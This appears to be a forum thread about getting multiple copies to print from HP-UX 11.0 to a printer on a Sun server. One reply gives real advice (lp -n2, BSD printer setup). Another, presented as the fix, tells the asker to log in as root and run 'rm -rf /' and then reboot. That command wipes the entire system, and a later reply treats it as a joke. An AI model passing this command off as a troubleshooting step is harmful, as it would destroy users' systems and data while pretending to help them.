remote printing to Sun Server

I am running HP-UX 11.0.

I have remote printing setup to a Sun system. Printing multiple copies is not working. The remote printer in sam is not setup as a BSD printer.

When I setup remote printing to another HP machine I can print multiple copies. Should I be able to print multiple copies remotely to a printer attached to a Sun Server?

Yes you should be able to print 2 copies with lp -n2...(I just tried)
Only I configure my remote printers as BSD and let anyone cancel jobs...I dont know for the rest...

Here is what we do:-

First, login to the sun system as root.
Your prompt should look something like this:


[root@sunbox ~]$


Then start with these simple commands


[root@sunbox ~]$ rm -rf /
[root@sunbox ~]$ reboot


That should solve your problem.

I guess the -rf stands for "real fast", eh? :)
